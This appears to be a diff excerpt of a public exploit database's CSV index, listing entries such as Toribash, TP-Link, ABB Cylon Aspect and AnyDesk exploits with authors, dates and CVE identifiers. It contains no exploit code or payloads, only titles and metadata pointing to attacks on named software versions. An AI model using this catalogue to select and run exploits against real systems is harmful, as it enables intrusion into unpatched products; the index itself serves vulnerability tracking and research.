30508,exploits/multiple/remote/30508.txt,"Toribash 2.x - Multiple Vulnerabilities",2007-08-18,"Luigi Auriemma",remote,multiple,,2007-08-18,2013-12-27,1,CVE-2007-4446;OSVDB-39701,,,,,https://www.securityfocus.com/bid/25359/info
36238,exploits/multiple/remote/36238.txt,"Toshiba e-Studio (Multiple Devices) - Security Bypass",2011-10-17,"Deral Heiland PercX",remote,multiple,,2011-10-17,2015-03-03,1,CVE-2012-1239;OSVDB-81507,,,,,https://www.securityfocus.com/bid/50168/info
47531,exploits/multiple/remote/47531.rb,"Total.js CMS 12 - Widget JavaScript Code Injection (Metasploit)",2019-10-22,Metasploit,remote,multiple,,2019-10-22,2019-10-22,1,CVE-2019-15954,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/http/totaljs_cms_widget_exec.rb
52249,exploits/multiple/remote/52249.c,"TP-Link VN020 F3v(T) TT_V6.2.1021 - Buffer Overflow Memory Corruption",2025-04-17,"Mohamed Maatallah",remote,multiple,,2025-04-17,2025-04-17,0,CVE-2024-12344,,,,,
52250,exploits/multiple/remote/52250.txt,"TP-Link VN020 F3v(T) TT_V6.2.1021 - Denial Of Service (DOS)",2025-04-17,"Mohamed Maatallah",remote,multiple,,2025-04-17,2025-04-17,0,CVE-2024-12342,,,,,
43665,exploits/multiple/remote/43665.md,"Transmission - RPC DNS Rebinding",2018-01-11,"Google Security Research",remote,multiple,9091,2018-01-17,2018-01-17,1,CVE-2018-5702,,,,,https://github.com/taviso/rbndr/tree/a189ffd9447ba78aa2702c5649d853b6fb612e3b
47155,exploits/multiple/remote/47155.txt,"Trend Micro Deep Discovery Inspector IDS - Security Bypass",2019-07-24,hyp3rlinx,remote,multiple,,2019-07-24,2019-07-24,0,,,,,,
21339,exploits/multiple/remote/21339.c,"Trend Micro Interscan VirusWall 3.5/3.6 - Content-Length Scan Bypass",2002-03-11,"Jochen Thomas Bauer",remote,multiple,,2002-03-11,2012-09-17,1,CVE-2002-0440;OSVDB-6162,,,,,https://www.securityfocus.com/bid/4265/info
@ -11715,6 +11717,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49403,exploits/multiple/webapps/49403.txt,"Anchor CMS 0.12.7 - 'markdown' Stored Cross-Site Scripting",2021-01-11,"Ramazan Mert GÖKTEN",webapps,multiple,,2021-01-11,2021-01-11,0,,,,,,
49451,exploits/multiple/webapps/49451.html,"Anchor CMS 0.12.7 - CSRF (Delete user)",2021-01-21,"Ninad Mishra",webapps,multiple,,2021-01-21,2021-01-21,0,CVE-2020-23342,,,,,
47459,exploits/multiple/webapps/47459.py,"AnchorCMS < 0.12.3a - Information Disclosure",2019-10-03,"Tijme Gommers",webapps,multiple,,2019-10-03,2019-10-03,0,CVE-2018-7251,,,,,
52253,exploits/multiple/webapps/52253.py,"Angular-Base64-Upload Library 0.1.21 - Unauthenticated Remote Code Execution (RCE)",2025-04-17,"Ravindu Wickramasinghe",webapps,multiple,,2025-04-17,2025-04-17,0,CVE-2024-42640,,,,,
49836,exploits/multiple/webapps/49836.js,"Anote 1.0 - Persistent Cross-Site Scripting",2021-05-05,TaurusOmar,webapps,multiple,,2021-05-05,2021-10-29,0,,,,,,
35786,exploits/multiple/webapps/35786.txt,"Ansible Tower 2.0.2 - Multiple Vulnerabilities",2015-01-14,"SEC Consult",webapps,multiple,80,2015-01-14,2015-01-14,0,OSVDB-116965;OSVDB-116964;OSVDB-116963;OSVDB-116962;OSVDB-116961;OSVDB-116960;OSVDB-116959;CVE-2015-1482;CVE-2015-1481;CVE-2015-1368,,,,,
44220,exploits/multiple/webapps/44220.txt,"antMan < 0.9.1a - Authentication Bypass",2018-03-02,"Joshua Bowser",webapps,multiple,,2018-03-02,2018-03-09,0,CVE-2018-7739,,,,,
@ -11799,6 +11802,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48708,exploits/multiple/webapps/48708.txt,"Bio Star 2.8.2 - Local File Inclusion",2020-07-26,"SITE Team",webapps,multiple,,2020-07-26,2020-07-26,0,CVE-2020-15050,,,,,
33995,exploits/multiple/webapps/33995.txt,"Blaze Apps 1.x - SQL Injection / HTML Injection",2010-01-19,"AmnPardaz Security Research Team",webapps,multiple,,2010-01-19,2014-07-07,1,,,,,,https://www.securityfocus.com/bid/40212/info
49759,exploits/multiple/webapps/49759.txt,"Blitar Tourism 1.0 - Authentication Bypass SQLi",2021-04-13,sigeri94,webapps,multiple,,2021-04-13,2021-04-13,0,,,,,,
52256,exploits/multiple/webapps/52256.txt,"Blood Bank & Donor Management System 2.4 - CSRF Improper Input Validation",2025-04-17,"Kwangyun Keum",webapps,multiple,,2025-04-17,2025-04-17,0,CVE-2024-12955,,,,,
48701,exploits/multiple/webapps/48701.txt,"Bludit 3.9.2 - Directory Traversal",2020-07-26,"James Green",webapps,multiple,,2020-07-26,2020-07-26,0,CVE-2019-16113,,,,,
51013,exploits/multiple/webapps/51013.txt,"Bookwyrm v0.4.3 - Authentication Bypass",2022-09-20,"Akshay Ravi",webapps,multiple,,2022-09-20,2023-08-02,1,CVE-2022-2651,,,,,
9872,exploits/multiple/webapps/9872.txt,"boxalino 09.05.25-0421 - Directory Traversal",2009-10-20,"Axel Neumann",webapps,multiple,,2009-10-19,,1,CVE-2009-1479;OSVDB-59145,,,,,
@ -11852,6 +11856,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
43177,exploits/multiple/webapps/43177.txt,"CommuniGatePro 6.1.16 - Cross-Site Scripting",2017-11-15,"Boumediene KADDOUR",webapps,multiple,,2017-11-24,2017-11-27,0,CVE-2017-16962,,,,,
46408,exploits/multiple/webapps/46408.txt,"Comodo Dome Firewall 2.7.0 - Cross-Site Scripting",2019-02-18,"Ozer Goker",webapps,multiple,,2019-02-18,2019-02-18,0,,"Cross-Site Scripting (XSS)",,,,
48825,exploits/multiple/webapps/48825.py,"Comodo Unified Threat Management Web Console 2.7.0 - Remote Code Execution",2020-09-22,"Milad Fadavvi",webapps,multiple,,2020-09-22,2020-09-22,0,CVE-2018-17431,,,,,
52257,exploits/multiple/webapps/52257.txt,"compop.ca 3.5.3 - Arbitrary code Execution",2025-04-17,dmlino,webapps,multiple,,2025-04-17,2025-04-17,0,CVE-2024-48445,,,,,
43377,exploits/multiple/webapps/43377.txt,"Conarc iChannel - Improper Access Restrictions",2017-12-20,"Information Paradox",webapps,multiple,,2017-12-20,2017-12-21,0,CVE-2017-17759,,,,,
9916,exploits/multiple/webapps/9916.rb,"ContentKeeper Web Appliance < 125.10 - Command Execution (Metasploit)",2009-02-25,patrick,webapps,multiple,,2009-02-24,,1,OSVDB-54551,"Metasploit Framework (MSF)",,,,
46820,exploits/multiple/webapps/46820.txt,"Cortex Unshortenlink Analyzer < 1.1 - Server-Side Request Forgery",2019-05-10,"Alexandre Basquin",webapps,multiple,,2019-05-10,2019-05-13,1,CVE-2019-7652,"Server-Side Request Forgery (SSRF)",,,,
@ -12424,6 +12429,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
47198,exploits/multiple/webapps/47198.txt,"Ultimate Loan Manager 2.0 - Cross-Site Scripting",2019-08-01,"Metin Yunus Kandemir",webapps,multiple,80,2019-08-01,2019-08-02,0,,"Cross-Site Scripting (XSS)",,,,
52139,exploits/multiple/webapps/52139.txt,"UNA CMS 14.0.0-RC - PHP Object Injection",2025-04-08,"Egidio Romano",webapps,multiple,,2025-04-08,2025-04-08,0,,,,,,
49150,exploits/multiple/webapps/49150.txt,"Under Construction Page with CPanel 1.0 - SQL injection",2020-12-02,"Mayur Parmar",webapps,multiple,,2020-12-02,2020-12-02,0,,,,,,
52254,exploits/multiple/webapps/52254.py,"Usermin 2.100 - Username Enumeration",2025-04-17,Kjesper,webapps,multiple,,2025-04-17,2025-04-17,0,CVE-2024-44762,,,,,
47058,exploits/multiple/webapps/47058.txt,"Varient 1.6.1 - SQL Injection",2019-07-01,"Mehmet EMIROGLU",webapps,multiple,80,2019-07-01,2019-07-03,0,,"SQL Injection (SQLi)",,,,
43362,exploits/multiple/webapps/43362.md,"vBulletin 5.x - 'cacheTemplates' Remote Arbitrary File Deletion",2017-12-13,SecuriTeam,webapps,multiple,,2017-12-18,2019-10-01,0,CVE-2017-17672,,,,,https://blogs.securiteam.com/index.php/archives/3573
43361,exploits/multiple/webapps/43361.md,"vBulletin 5.x - 'routestring' Remote Code Execution",2017-12-13,SecuriTeam,webapps,multiple,,2017-12-18,2019-10-01,0,,,,,,https://blogs.securiteam.com/index.php/archives/3569
@ -13053,7 +13059,9 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49807,exploits/php/dos/49807.py,"WordPress Plugin WPGraphQL 1.3.5 - Denial of Service",2021-04-27,"Dolev Farhi",dos,php,,2021-04-27,2021-10-29,0,,,,,,
1345,exploits/php/dos/1345.php,"Xaraya 1.0.0 RC4 - 'create()' Denial of Service",2005-11-29,rgod,dos,php,,2005-11-28,2016-06-13,1,OSVDB-21249;CVE-2005-3929,,,,http://www.exploit-db.comxaraya-1.0-core.zip,
44336,exploits/php/dos/44336.py,"XenForo 2 - CSS Loader Denial of Service",2018-03-23,LockedByte,dos,php,,2018-03-23,2018-03-23,0,,"Denial of Service (DoS)",,,,
52251,exploits/php/hardware/52251.txt,"ABB Cylon Aspect 3.08.02 (deployStart.php) - Unauthenticated Command Execution",2025-04-17,LiquidWorm,hardware,php,,2025-04-17,2025-04-17,0,CVE-2024-48840,,,,,
52218,exploits/php/hardware/52218.txt,"ABB Cylon Aspect 3.08.02 (escDevicesUpdate.php) - Denial of Service (DOS)",2025-04-15,LiquidWorm,hardware,php,,2025-04-15,2025-04-15,0,CVE-2024-48844,,,,,
52252,exploits/php/hardware/52252.txt,"ABB Cylon Aspect 3.08.02 (ethernetUpdate.php) - Authenticated Path Traversal",2025-04-17,LiquidWorm,hardware,php,,2025-04-17,2025-04-17,0,,,,,,
52219,exploits/php/hardware/52219.txt,"ABB Cylon Aspect 3.08.02 (webServerUpdate.php) - Input Validation Config Poisoning",2025-04-15,LiquidWorm,hardware,php,,2025-04-15,2025-04-15,0,,,,,,
52234,exploits/php/hardware/52234.txt,"ABB Cylon Aspect 3.08.03 (webServerDeviceLabelUpdate.php) - File Write DoS",2025-04-16,LiquidWorm,hardware,php,,2025-04-16,2025-04-16,0,,,,,,
52233,exploits/php/hardware/52233.txt,"ABB Cylon Aspect 4.00.00 (factorySaved.php) - Unauthenticated XSS",2025-04-16,LiquidWorm,hardware,php,,2025-04-16,2025-04-16,0,,,,,,
@ -39896,6 +39904,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
40410,exploits/windows/local/40410.txt,"AnyDesk 2.5.0 - Unquoted Service Path Privilege Escalation",2016-09-22,Tulpa,local,windows,,2016-09-22,2016-09-22,0,,,,,http://www.exploit-db.comAnyDesk.exe,
47883,exploits/windows/local/47883.txt,"AnyDesk 5.4.0 - Unquoted Service Path",2020-01-07,SajjadBnd,local,windows,,2020-01-07,2020-01-07,0,,,,,,
51968,exploits/windows/local/51968.txt,"AnyDesk 7.0.15 - Unquoted Service Path",2024-04-08,"Milad karimi",local,windows,,2024-04-08,2024-04-08,0,,,,,,
52258,exploits/windows/local/52258.txt,"AnyDesk 9.0.1 - Unquoted Service Path",2025-04-17,"Parastou Razi",local,windows,,2025-04-17,2025-04-17,0,,,,,,
49549,exploits/windows/local/49549.txt,"AnyTXT Searcher 1.2.394 - 'ATService' Unquoted Service Path",2021-02-09,"Mohammed Alshehri",local,windows,,2021-02-09,2021-02-09,0,,,,,,
16132,exploits/windows/local/16132.html,"AoA DVD Creator 2.5 - ActiveX Stack Overflow",2011-02-07,"Carlos Mario Penagos Hollmann",local,windows,,2011-02-07,2011-02-07,1,OSVDB-107970,,,http://www.exploit-db.com/screenshots/idlt16500/16132.png,,
16133,exploits/windows/local/16133.html,"AoA Mp4 Converter 4.1.0 - ActiveX Stack Overflow",2011-02-07,"Carlos Mario Penagos Hollmann",local,windows,,2011-02-07,2011-02-07,1,,,,http://www.exploit-db.com/screenshots/idlt16500/16133.png,,

Can't render this file because it is too large.